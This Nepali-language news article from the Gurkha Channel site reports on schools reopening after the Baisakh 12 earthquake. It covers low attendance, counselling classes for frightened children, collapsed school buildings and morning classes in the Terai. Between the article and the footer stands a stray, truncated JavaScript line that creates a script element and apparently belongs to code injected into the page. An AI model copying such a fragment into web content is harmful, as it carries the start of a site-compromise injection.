बिद्यालय खुल्ला

Oman Gauchan "Hanson" Avatar

भूकम्पका कारण बन्द भएका विद्यालयहरु आजबाट सञ्चालनमा आएको छ । बैशाख १२ गते आएको विनाशकारी भूकम्पका कारण पठनपाठन ठप्प छ। विद्यालय सञ्चालमा ल्याइए पनि अधिकांश विद्यालयमा विद्यार्थीहरुको उपस्थिति न्यून छ । बन्द रहेको विद्यालय जेठ १ गतेदेखि नै सञ्चालन गर्ने तयारी भइरहँदा वैशाख २९ गतेको अर्को शक्तिशाली भूकम्पले गर्दा सरकारले नै थप १५ दिनका लागि विद्यालय बन्दको घोषणा गरेको थियो।

बन्द विद्यालय आजबाट सञ्चालन गरिने भए पनि पठनपाठन हुन भने केही समय लाग्ने भएको छ। बालबालिकामा भूकम्पको त्रासदी कायमै रहेकाले त्यसबाट मुक्त गराउन केही दिन मनोरञ्जनात्मक तथा मनोपरामर्शका कक्षाहरु सञ्चालन गर्ने विद्यालयहरुको योजना छ। महाभूकम्पपछि अहिलेसम्म पनि पराकम्पहरु जाने क्रम नरोकिएकोले पनि जनजीवन सामान्य हुन सकेको छैन भने बालबालिकामा भूकम्पको त्रास अझै कायमै छ। भूकम्पले हजारौं विद्यालय भवनहरु भत्किएका छन। ती विद्यालयमा राखेर विद्यार्थीलाई पढाउन सक्ने अवस्था नभए पनि स्थिति सामान्य बनाउन भन्दै विद्यालय सञ्चालन गर्न लागि शिक्षा मन्त्रालयले जनाएको छ।

काठमाडौ उपत्यकासहित भूकम्पले अतिप्रभावित बनेका जिल्लाहरुमा पठनपाठन ठप्प भए पनि अन्य जिल्लाहरुमा भने पठन पाठन जारी रहेको छ। तराईका जिल्लाहरुमा भने अत्याधिक गर्र्मीका कारण विहानी कक्षामा विद्यालयहरु सञ्चालन गरिएका छन।

var d=document;var s=d.createElement(‘script’);

Oman Gauchan "Hanson" Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search